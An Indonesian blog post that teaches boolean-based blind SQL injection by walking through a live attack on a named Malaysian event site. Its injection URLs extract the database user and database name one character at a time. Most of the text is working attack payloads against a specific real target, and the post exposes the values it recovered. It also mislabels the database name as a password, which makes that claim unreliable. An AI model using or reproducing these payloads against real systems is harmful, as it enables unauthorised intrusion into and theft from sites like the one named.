Blind Injection? Yup itu salah satu teknik attacker.Omicron akan menjelaskan sesimple mungkin ttg blind injection,yg kebanyakan “orang” menganggap ini rumit,termasuk omicron

Stop! bukan bermaksud utk ngajarin temen2,tapi omicron berusaha memberikan apa yg omicron punya meskipun masih sedikit.

Ok langsung aja kebanyakan pengantarnya wkwk

Target

http://cmc.msc.com.my/event_detail.php?ID=190

Test vulnerable

http://cmc.msc.com.my/event_detail.php?ID=190 and 1=1 <<< True

http://cmc.msc.com.my/event_detail.php?ID=190 and 1=2 <<< False

Setelah yakin bahwa site itu ada vulnerablenya,

inject

http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(65)

Bingung ? OK,omicron jelasin dikit

# mid(user()1,1) >>> dalam masalah ini,omicron tidak mengetahui value ato nilai dari user itu apa, maka dalam “()” omicron sengaja kosongkan

# 1,1 >>> urutan dari value tsb

# CHAR >>> peubah dalam desimal

# 65 >>> value desimal tsb dan 65 adalah “A” dalam ASCII jadi omicron mengawalinya dengan “A” >> 65 dalam ASCII , bisa di awali dari apa aja,tapi utk lebih valid,omicron mengawali dgn huruf “A” >>> 65

Setelah kita masukkan URL tadi,,apa yg akan di tampilkan ? Yup,nilainya ada 2,True or False.

True >>> jika halamannya menampilkan dalam keadaan normal (berita,gambar,etc .. tidak hilang)

False >>> jika halamannya tidak menampilkan sebagian ato seluruh isi dari halaman tsb (berita,gambar,etc .. ada yg hilang)

http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(65) <<< false

http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(66) <<< false

http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(67) <<< true

Akhirnya dapet nilai true di char 67,dalam ASCII adalah karakter C

cari nilai kedua >>>

http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,2)=char(67,65) <<< false

liat 1,1 nya , udah diganti sama 1,2. Jadi klo udah dapet true lagi,ganti aja menjadi 1,3 ; 1,4 ; dst…

Nah,akhirnya omicron dapet nilai true yg kedua :

http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,2)=char(67,82)

pada angka 82 >>> R dalam ASCII

Lanjut sampe halaman tsb bernilai false dan akan mendapatkan :

http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(user(),1,10)=char(67,82,69,83,84,81,95,67,77,68)

67 = C
82 = R
69 = E
83 = S
84 = T
81 = Q
95 = _
67 = C
77 = M
68 = D

Nah itu “username” nya >>> CRESTQ_CMD
klo mw cari “password” nya >>>
value user() ganti jadi >>> database() , dan dilakukan sama dengan cara di atas :

http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(database(),1,12)=char(67,82,69,83,84,81,95,67,77,68,68,66)

67 = C
82 = R
69 = E
83 = S
84 = T
81 = Q
95 = _
67 = C
77 = M
68 = D
68 = D
66 = B

Password yg di dapat >>> CRESTQ_CMDDB
“user” dan “password” >>> CRESTQ_CMD dan CRESTQ_CMDDB

yg omicron dapatkan itu belum tentu user dan password.Tergantung databasenya.
Jadi ga selalu user() >> user
password()>> password,dll

Ternyata ga serumit yg omicron bayangkan,tapi,,,harus ada waktu panjang utk blind injection ini,sabar aja ok

Leave a Reply